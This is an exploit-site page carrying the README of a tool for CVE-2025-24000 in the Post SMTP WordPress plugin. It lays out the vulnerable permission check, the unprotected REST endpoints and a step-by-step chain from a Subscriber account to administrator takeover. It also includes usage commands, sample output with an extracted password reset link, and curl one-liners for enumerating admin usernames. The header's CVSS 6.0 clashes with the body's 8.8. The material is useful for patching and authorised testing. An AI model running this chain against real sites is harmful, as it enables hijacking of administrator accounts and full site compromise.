Exploit for CVE-2025-24000

Name: Exploit for CVE-2025-24000
Rating: 5 (119 reviews)
2026-04-14 | CVSS 6.0
## https://sploitus.com/exploit?id=00B103F8-BE7C-5681-9040-F6DCA403D67B
# CVE-2025-24000 — Post SMTP Privilege Escalation Exploit

## Overview

This script exploits **CVE-2025-24000**, a high-severity broken access control vulnerability in the **Post SMTP WordPress plugin** (versions ≤ 3.2.0). It allows any authenticated user with a low-privilege account (e.g. Subscriber) to access the plugin's REST API email logs, steal an admin password reset link, and take over the administrator account.

- **CVE:** CVE-2025-24000
- **Plugin:** Post SMTP (WPExperts)
- **Affected versions:** ≤ 3.2.0
- **Fixed in:** 3.3.0
- **CVSS Score:** 8.8 (High)
- **Impact:** Privilege Escalation → Full Admin Account Takeover

---

## How It Works

The vulnerability stems from a flawed permission check in the plugin's REST API:

```php
// Vulnerable code (≤ 3.2.0)
public function get_logs_permission() {
    return is_user_logged_in();
}
```

Any logged-in user, regardless of role, can access endpoints intended for administrators only:

- `GET /wp-json/psd/v1/get-logs`
- `GET /wp-json/psd/v1/get-details?id=&type=show_view`
- `POST /wp-json/psd/v1/resend-email`

### Exploit Chain

1. Register or use an existing low-privilege WordPress account (Subscriber)
2. Log in and obtain a WP REST nonce from `/wp-admin/`
3. Trigger a password reset for the admin account
4. Read the email logs via the unprotected REST API
5. Extract the password reset link from the log
6. Use the reset link to set a new admin password
7. Log into `/wp-admin` as administrator

---

## Requirements

- Python 3.x
- `requests` library (`pip install requests`)
- A registered account on the target WordPress site (Subscriber level is enough)

---

## Usage

```bash
python3 exploit_cve_2025_24000.py \
  --url  \
  --username  \
  --password  \
  --email 
```

### Arguments

| Argument | Description |
|---|---|
| `--url` | Base URL of the WordPress site (e.g. `http://target.local/wordpress/`) |
| `--username` | Your low-privilege WordPress username |
| `--password` | Your low-privilege WordPress password |
| `--email` | Admin username or email to reset |

### Example

```bash
python3 exploit_cve_2025_24000.py \
  --url http://samurai.local/samurai/ \
  --username attacker \
  --password Password1 \
  --email shogun
```

### Expected Output

```
[*] Logging in as attacker...
[+] Logged in successfully as attacker
[*] Fetching WP REST nonce from wp-admin...
[+] Got nonce: a5f398e081
[*] Triggering password reset for: shogun
[+] Password reset triggered.
[*] Fetching email logs...
[+] Got logs response.
[*] Checking 1 email(s) for reset link...

[+] RESET LINK FOUND:
    http://samurai.local/samurai/wp-login.php?action=rp&key=XXXXXXXXXXXX&login=shogun

[*] Visit the link above to set a new admin password and take over the site.
```

---

## Tips

- If the admin username is unknown, enumerate it via the WP REST API:
  ```bash
  curl -s 'http://target.local/wp-json/wp/v2/users' | python3 -m json.tool
  ```
  Or via author enumeration:
  ```bash
  curl -s 'http://target.local/?author=1' -I | grep -i location
  ```
- The reset link is single-use and expires — use it immediately after extraction
- If logs are empty, make sure the site is configured to send mail through Post SMTP (not PHP mail)

---

## References

- **Patchstack Advisory:** https://patchstack.com/database/wordpress/plugin/post-smtp/vulnerability/wordpress-post-smtp-3-2-0-privilege-escalation-vulnerability
- **GitHub Advisory:** https://github.com/advisories/GHSA-2fgh-78wf-f9v9
- **Reproduction Walkthrough:** https://medium.com/@security_56355/from-subscriber-to-admin-reproducing-cve-2025-24000-in-wordpress-post-smtp-plugin-8105ff85e274
- **NVD:** https://nvd.nist.gov/vuln/detail/CVE-2025-24000

---

## Disclaimer

This tool is intended for authorized penetration testing and educational purposes only. Do not use against systems you do not have explicit permission to test.